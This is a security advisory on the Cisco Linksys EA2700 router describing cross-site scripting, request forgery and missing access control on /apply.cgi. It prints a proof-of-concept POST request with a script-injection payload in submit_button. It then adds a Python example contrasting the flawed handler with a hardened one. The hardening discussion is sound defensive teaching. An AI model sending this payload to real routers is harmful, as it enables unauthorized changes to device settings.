Release date:
Updated on:
Affected Systems:
Cisco Linksys EA2700
Description:
--------------------------------------------------------------------------------
Bugtraq id: 59054
The Cisco Linksys EA2700 is a smart Wi-Fi router.
Cisco Linksys EA2700 (firmware version 1.0.12.128947) has multiple security vulnerabilities. Malicious users can exploit these vulnerabilities to carry out cross-site scripting and cross-site request forgery attacks and to bypass certain security restrictions. The vulnerabilities are due to the absence of correct access restrictions on the /apply.cgi script, which allows unauthorized access to device settings; the value of the "submit_button" POST parameter passed to /apply.cgi is not properly filtered, so arbitrary HTML and script code can be executed in the browser of a user of the affected site; and the application does not check the validity of HTTP requests, so attackers can change device settings.
<* Source: Phil Purviance
Link: http://www.securelist.com/en/advisories/52985
https://superevr.com/blog/2013/dont-use-linksys-routers/
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use at your own risk!
POST /apply.cgi HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 47

submit_button=xss'%3balert(1)//934&action=Apply
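The following is an added example, not code from the advisory or from the Linksys firmware. It models the two defects the description names (the submit_button value echoed into the response unescaped, and no check that the request really came from the router's own UI) and puts a hardened handler beside the flawed one. The reflection context, the allowlist of page names, the csrf_token field and the origin check are assumptions made for illustration; only the request body and the Host value come from the advisory.

```python
import hmac
import html
from urllib.parse import parse_qs, urlparse

# Constructed values: the advisory gives the router's address but not its page names.
ROUTER_ORIGIN = "http://192.168.1.1"
ALLOWED_SUBMIT_BUTTONS = {"index", "Wireless_Basic", "Management"}  # hypothetical allowlist


def _form(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into single-valued fields."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def vulnerable_apply_cgi(body: str) -> str:
    """Model of the flaw described above (hypothetical reflection context):
    the request is not validated at all, and submit_button lands verbatim inside
    a single-quoted JavaScript string, so a value containing ' breaks out of it."""
    submit_button = _form(body).get("submit_button", "")
    return f"<html><script>var page='{submit_button}';</script></html>"


def _same_origin(headers: dict) -> bool:
    """CSRF defence 1: the browser-supplied Origin (or, failing that, Referer)
    must name the router itself. A request triggered from another site fails here."""
    source = headers.get("Origin") or headers.get("Referer") or ""
    parsed = urlparse(source)
    return f"{parsed.scheme}://{parsed.netloc}" == ROUTER_ORIGIN


def hardened_apply_cgi(body: str, headers: dict, session_csrf_token: str) -> tuple[int, str]:
    """Hardened handler: reject cross-origin requests, require a per-session CSRF token
    that a third-party page cannot read, allowlist submit_button, and escape any value
    that is echoed back. Returns (status code, response body)."""
    if not _same_origin(headers):
        return 403, "cross-origin request rejected"

    form = _form(body)
    # CSRF defence 2: constant-time comparison of the submitted token with the session's.
    if not hmac.compare_digest(form.get("csrf_token", ""), session_csrf_token):
        return 403, "missing or invalid csrf_token"

    submit_button = form.get("submit_button", "")
    if submit_button not in ALLOWED_SUBMIT_BUTTONS:
        return 400, "unknown submit_button"

    # Even an allowlisted value is escaped before it reaches HTML/JS context.
    safe = html.escape(submit_button)
    return 200, f"<html><script>var page='{safe}';</script></html>"


if __name__ == "__main__":
    poc_body = "submit_button=xss'%3balert(1)//934&action=Apply"  # body from the advisory
    print(vulnerable_apply_cgi(poc_body))
    print(hardened_apply_cgi(poc_body, {"Origin": "http://attacker.example"}, "tok"))
    print(hardened_apply_cgi(poc_body + "&csrf_token=tok", {"Origin": ROUTER_ORIGIN}, "tok"))
```

Run against the advisory's request body, the flawed handler returns a page in which `xss';alert(1)//934` has closed the JavaScript string, while the hardened handler stops the same request three separate times: at the origin check when it is sent from another site, at the token check when the token is absent, and at the allowlist when the value is not a known page. Either of the two CSRF checks alone is a defence; keeping both means a bug in one does not reopen the request-forgery path.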
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Cisco
-----
Currently, the vendor has not released a patch or upgrade. We recommend that users of this product follow the vendor's homepage to obtain the latest version:
http://www.linksys.com/en-eu/products/routers/EA2700